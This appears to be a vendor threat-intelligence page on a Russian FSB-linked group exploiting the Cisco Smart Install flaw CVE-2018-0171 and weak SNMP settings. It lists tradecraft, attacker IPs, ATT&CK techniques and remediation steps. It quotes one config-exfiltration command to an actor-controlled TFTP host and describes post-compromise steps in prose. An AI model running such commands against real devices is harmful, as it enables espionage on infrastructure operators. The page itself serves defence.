Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco Smart Install Flaw Against Critical Infrastructure
Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco (TL-2026-1282), also tracked as Static Tundra Cisco Smart Install Campaign, is a critical-severity software vulnerability scored CVSS 9.8, first published 2026-07-13. It is attributed to Static Tundra (Russia) with high confidence, affects Cisco IOS Software, references 1 CVE (CVE-2018-0171), maps to 27 MITRE ATT&CK techniques (T1016, T1040, T1041), and is covered by 9 detection rules and 22 indicators of compromise.
Key facts for TL-2026-1282
- Threat ID
- TL-2026-1282
- Also known as
- Static Tundra Cisco Smart Install Campaign
- Severity
- CRITICAL
- CVSS
- 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- Status
- ACTIVE
- Category
- VULNERABILITY
- First published
- 2026-07-13
- Last reviewed
- 2026-07-13
- Attribution
- Static Tundra
- Attribution confidence
- HIGH
- Nation-state nexus
- Russia
- Motivation
- ESPIONAGE
- Target sectors
- energy, communications, telecoms, defense industrial base, health, financial services, government administration, higher education, manufacturing
- Target regions
- North America, Europe, Asia, Africa, ukraine
- Detection rules
- 9
- Indicators of compromise
- 22
Malware and tooling in Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco
Malware and tooling: SYNful Knock - S0519, CISCO-CONFIG-COPY-MIB abuse
NSA, FBI, and CISA, joined by 15 allied agencies across nine countries, issued a joint advisory on Static Tundra (aka Berserk Bear, Energetic Bear, Crouching Yeti, Dragonfly, Ghost Blizzard), a Russian FSB Center 16-linked espionage group aggressively exploiting CVE-2018-0171 in Cisco IOS/IOS XE Smart Install since November 2021, combined with weak/default SNMP community strings, to compromise routers, deploy firmware implants, and exfiltrate device configurations from critical infrastructure.
How Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco works
Static Tundra is a Russian state-sponsored cyber-espionage group, assessed by Cisco Talos to be linked to the FSB's Center 16 unit and likely a sub-cluster of the longer-running Energetic Bear (Berserk Bear/Dragonfly) activity cluster, with operations tracing back over a decade to at least 2015. The group's hallmark tradecraft is network-device-centric espionage: rather than deploying conventional endpoint malware, Static Tundra targets routers and switches directly, favoring unpatched, end-of-life Cisco IOS and IOS XE devices.
The group's primary current initial-access vector is CVE-2018-0171, a critical (CVSS 9.8) unauthenticated remote code execution / denial-of-service vulnerability in the Cisco Smart Install feature. Despite being patched by Cisco in 2018, Static Tundra has aggressively and continuously exploited unpatched instances since at least November 2021, sending crafted Smart Install messages to TCP port 4786 to trigger a stack/buffer overflow that grants administrative control of the device. In parallel, the group scans for and abuses devices still configured with default or weak SNMP community strings (e.g., "public", "anonymous"), issuing SNMP commands — sometimes with spoofed source IP addresses to bypass access control lists — to read and rewrite device configuration.
Once administrative access is obtained, Static Tundra exfiltrates the full running/startup configuration via TFTP or FTP (commands such as `copy running-config tftp://<actor_ip>/config.txt` or via the CISCO-CONFIG-COPY-MIB SNMP object), harvesting Type 7 (Vigenere-cipher, trivially reversible) passwords, plaintext credentials, SNMP community strings, and TACACS+ secrets embedded in the config. The group then re-uses these harvested credentials to pivot deeper, create new privileged (privilege level 15) local accounts, enable TELNET where disabled, modify TACACS+ configuration to degrade centralized logging, adjust ACLs to permit continued actor access, and in some cases establish GRE tunnels to redirect and collect NetFlow/traffic data. For long-term persistence on more capable platforms, Talos assesses with moderate confidence that Static Tundra is associated with the historic SYNful Knock firmware implant — a modular backdoor injected directly into the Cisco IOS image that survives reboots and is remotely activated via a crafted TCP SYN "magic packet."
Victimology spans telecommunications, higher education, and manufacturing globally (North America, Asia, Africa, Europe), with a documented escalation in targeting of Ukraine and allied nations following Russia's 2022 full-scale invasion. The July 2026 joint advisory broadens the disclosed target set to energy, defense industrial base, healthcare, financial services, and state/local government sectors, reflecting continued FSB strategic-intelligence and pre-positioning objectives against Western critical infrastructure. The nine-country coalition advisory (US, Australia, UK, Canada, New Zealand, Estonia, Finland, France, Italy) underscores the scale and persistence of the campaign and urges immediate disabling of Smart Install, migration to SNMPv3, and replacement of end-of-life hardware.
MITRE ATT&CK techniques used in TL-2026-1282
Discovery
T1016 System Network Configuration Discovery; T1046 Network Service Discovery; T1087 Account Discovery
Credential Access
T1040 Network Sniffing; T1110 Brute Force; T1552 Unsecured Credentials
Exfiltration
T1041 Exfiltration Over C2 Channel; T1048 Exfiltration Over Alternative Protocol
Execution
T1059 Command and Scripting Interpreter
Defense Evasion
Initial Access
T1078 Valid Accounts; T1133 External Remote Services; T1190 Exploit Public-Facing Application
Privilege Escalation
Command and Control
T1090 Proxy; T1095 Non-Application Layer Protocol
Persistence
T1098 Account Manipulation; T1136 Create Account
Collection
T1119 Automated Collection; T1557 Adversary-in-the-Middle; T1602 Data from Configuration Repository
Lateral Movement
T1210 Exploitation of Remote Services
Impact
T1499 Endpoint Denial of Service
resource-development
T1584 Compromise Infrastructure
Reconnaissance
T1590 Gather Victim Network Information; T1595 Active Scanning
defense-impairment
Affected products and versions in Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco
- Cisco — IOS Software
Vulnerable versions: Smart Install-enabled releases prior to fix; 15.2(5)e
Fixed in: Per cisco-sa-20180328-smi2 fixed release table - Cisco — IOS XE Software
Vulnerable versions: Smart Install-enabled releases prior to fix
Fixed in: Per cisco-sa-20180328-smi2 fixed release table
Remediation for Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco
Patches
- Cisco IOS/IOS XE fixed releases per cisco-sa-20180328-smi2 (patched 2018-03-28)
Immediate actions
- Disable Cisco Smart Install globally with 'no vstack' on all IOS/IOS XE devices
- Patch CVE-2018-0171 immediately per Cisco Security Advisory cisco-sa-20180328-smi2
- Block TCP/4786 (Smart Install), TFTP, and SNMP at network perimeter and management-plane ACLs
- Rotate all SNMP community strings; disable default/weak strings such as 'public' and 'anonymous'
- Disable TELNET on VTY lines; enforce 'transport input ssh'
Workarounds
- Disable Smart Install via 'no vstack' if immediate patching is infeasible
- Use Type 8 password hashing for local accounts and Type 6 encryption for TACACS+ keys
Longer-term hardening
- Migrate all SNMP to SNMPv3 with authPriv
- Replace end-of-life Cisco networking hardware that cannot receive further security patches
- Deploy centralized, integrity-verified configuration management; do not trust running device config as source of truth
- Implement MFA and AAA controls for all device management access
- Encrypt all management-plane traffic (SSH, HTTPS, NETCONF/RESTCONF, SNMPv3)
- Continuously monitor TACACS+/RADIUS authentication logs for gaps or tampering
CVEs associated with Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco
Weaknesses (CWE) in Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco
CWE-787, CWE-20
Timeline of Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco
- Static Tundra activity first observed by Cisco Talos; historically associated with the SYNful Knock Cisco IOS firmware implant, publicly reported in 2015.
- Cisco discloses and patches CVE-2018-0171, a critical (CVSS 9.8) Smart Install unauthenticated RCE/DoS vulnerability, via advisory cisco-sa-20180328-smi2.
- FBI/CISA assess Static Tundra began aggressive, sustained exploitation of the unpatched CVE-2018-0171 flaw against critical infrastructure network devices.
- Following Russia's full-scale invasion of Ukraine, Static Tundra escalates targeting of Ukrainian and allied-nation network infrastructure.
- Attacker infrastructure IP 185.141.24.222 observed active in Static Tundra operations per Talos telemetry.
- Attacker infrastructure IPs 185.141.24.28 and 185.82.200.181 begin an active-use window through late 2024/mid-2025.
- Attacker infrastructure IP 185.82.202.34 active through late February 2025.
- Last observed activity window for attacker infrastructure IP 185.141.24.28, per Talos IOC telemetry.
- Cisco Talos, FBI, and CISA jointly publish detailed technical analysis and IC3 PSA (PSA250820) on Static Tundra's Cisco Smart Install and SNMP exploitation campaign.
- NSA, FBI, and CISA, joined by 15 agencies across Australia, UK, Canada, New Zealand, Estonia, Finland, France, and Italy, publish a renewed joint advisory on Static Tundra targeting critical infrastructure network devices with CVE-2018-0171 and weak SNMP authentication.
Sources cited for Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco
- US and allies share defense tips against Russian hackers targeting critical infrastructure
- Russian state-sponsored espionage group Static Tundra compromises unpatched end-of-life network devices
- Cisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability
- CVE-2018-0171 Detail
- FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage
- Internet Crime Complaint Center (IC3) PSA: Russian Government Cyber Actors Targeting Networking Devices, Critical Infrastructure
- Russian Government Cyber Actors Targeting Networking Devices, Critical Infrastructure
- CVE-2018-0171 Static Tundra Smart Install Detection Guide
- Russian FSB Center 16 exploits Cisco flaw in cyber espionage campaign to target critical infrastructure
- Russian state cyber group Static Tundra exploiting Cisco devices, FBI warns
- Russian Espionage Group Static Tundra Targets Legacy Cisco Flaw
- FSB Center 16 Exploited Default Router Passwords to Map Critical Infrastructure for Years
- FBI: Russia-linked group Static Tundra exploit old Cisco flaw for espionage
- Russian hackers exploit old Cisco flaw to target global enterprise networks
- A vulnerability in the Smart Install feature of Cisco IOS
Threats related to Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco
- FSB Center 16 (Static Tundra) Exploits SNMP Config Exfiltration and Cisco Smart Install RCE (CVE-2018-0171) Against Routers
- Russian FSB Center 16 (Static Tundra/Berserk Bear) Exploiting Unpatched Cisco Smart Install Devices — Joint NSA/FBI/13-Nation Advisory
- CVE-2008-4128 Cisco IOS CSRF Vulnerability Added to CISA KEV — Exploited by Russian FSB Center 16 (Static Tundra / Berserk Bear) in Ongoing Router-Hygiene Espionage Campaign
- FSB Center 16 (Static Tundra / Berserk Bear) Exploits Default/Weak SNMP and Unpatched Cisco Smart Install (CVE-2018-0171) to Compromise Networking Devices — AA26-194A
- NSA/FBI Joint Advisory: Disable Cisco Smart Install to Block Russian FSB "Static Tundra" Exploitation of CVE-2018-0171
- FSB Centre 16 (Berserk Bear/Static Tundra) Targets Critical Infrastructure via Weak SNMP Credentials and Cisco Smart Install Exploitation (CVE-2018-0171) — UK/EU Attribute December 2025 Poland Energy Grid Attack
Detection coverage for TL-2026-1282
As of 2026-07-13, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1282 across Splunk SPL, Microsoft KQL and Sigma, covering 22 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.
Community OSINT corroboration for TL-2026-1282
1 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.